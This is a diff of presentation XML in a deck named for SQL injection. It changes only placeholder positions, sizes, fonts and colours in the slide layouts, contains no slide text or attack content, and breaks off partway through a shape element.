--- a/slides/SQLi-Preso.pptx
+++ b/slides/SQLi-Preso.pptx
@@ -17,7 +17,6 @@
     <p:sldId id="264" r:id="rId12"/>
     <p:sldId id="265" r:id="rId13"/>
     <p:sldId id="266" r:id="rId14"/>
-    <p:sldId id="267" r:id="rId15"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="7772400" cy="10058400"/>
@@ -65,7 +64,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="26" name="PlaceHolder 1"/>
+          <p:cNvPr id="23" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -75,8 +74,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -85,18 +84,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="27" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="24" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -106,8 +103,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="10515240" cy="2075040"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="10972440" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -118,18 +115,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="28" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="25" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -139,8 +133,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="4098240"/>
-            <a:ext cx="10515240" cy="2075040"/>
+            <a:off x="609480" y="3682080"/>
+            <a:ext cx="10972440" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -151,11 +145,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -184,7 +175,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="29" name="PlaceHolder 1"/>
+          <p:cNvPr id="26" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -194,8 +185,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -204,18 +195,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="30" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="27" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -225,8 +214,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -237,18 +226,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="31" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="28" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -258,8 +244,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="6231960" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -270,18 +256,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="32" name="PlaceHolder 4"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="29" name="PlaceHolder 4"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -291,8 +274,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="4098240"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="609480" y="3682080"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -303,18 +286,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="33" name="PlaceHolder 5"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="30" name="PlaceHolder 5"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -324,8 +304,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="4098240"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="6231960" y="3682080"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -336,11 +316,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -369,7 +346,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="34" name="PlaceHolder 1"/>
+          <p:cNvPr id="31" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -379,8 +356,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -389,18 +366,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="35" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="32" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -410,8 +385,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -422,18 +397,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="36" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="33" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -443,8 +415,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4393440" y="1825560"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="4319640" y="1604520"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -455,18 +427,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="37" name="PlaceHolder 4"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="34" name="PlaceHolder 4"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -476,8 +445,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="7949160" y="1825560"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="8029800" y="1604520"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -488,18 +457,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="38" name="PlaceHolder 5"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="35" name="PlaceHolder 5"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -509,8 +475,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="4098240"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="609480" y="3682080"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -521,18 +487,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="39" name="PlaceHolder 6"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="36" name="PlaceHolder 6"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -542,8 +505,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4393440" y="4098240"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="4319640" y="3682080"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -554,18 +517,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="40" name="PlaceHolder 7"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="37" name="PlaceHolder 7"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -575,8 +535,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="7949160" y="4098240"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="8029800" y="3682080"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -587,11 +547,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -642,7 +599,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="46" name="PlaceHolder 1"/>
+          <p:cNvPr id="40" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -652,8 +609,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -662,18 +619,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="47" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="41" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -683,8 +638,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="10515240" cy="4350960"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="10972440" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -724,7 +679,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="48" name="PlaceHolder 1"/>
+          <p:cNvPr id="42" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -734,8 +689,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -744,18 +699,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="49" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="43" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -765,8 +718,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="10515240" cy="4350960"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="10972440" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -777,11 +730,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -810,7 +760,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="50" name="PlaceHolder 1"/>
+          <p:cNvPr id="44" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -820,8 +770,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -830,18 +780,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="51" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="45" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -851,8 +799,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="5131080" cy="4350960"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="5354280" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -863,18 +811,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="52" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="46" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -884,8 +829,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="1825560"/>
-            <a:ext cx="5131080" cy="4350960"/>
+            <a:off x="6231960" y="1604520"/>
+            <a:ext cx="5354280" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -896,11 +841,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -929,7 +871,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="53" name="PlaceHolder 1"/>
+          <p:cNvPr id="47" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -939,8 +881,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -949,11 +891,9 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -982,7 +922,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="54" name="PlaceHolder 1"/>
+          <p:cNvPr id="48" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -992,8 +932,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="6144120"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="5307840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1033,7 +973,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="55" name="PlaceHolder 1"/>
+          <p:cNvPr id="49" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1043,8 +983,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1053,18 +993,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="56" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
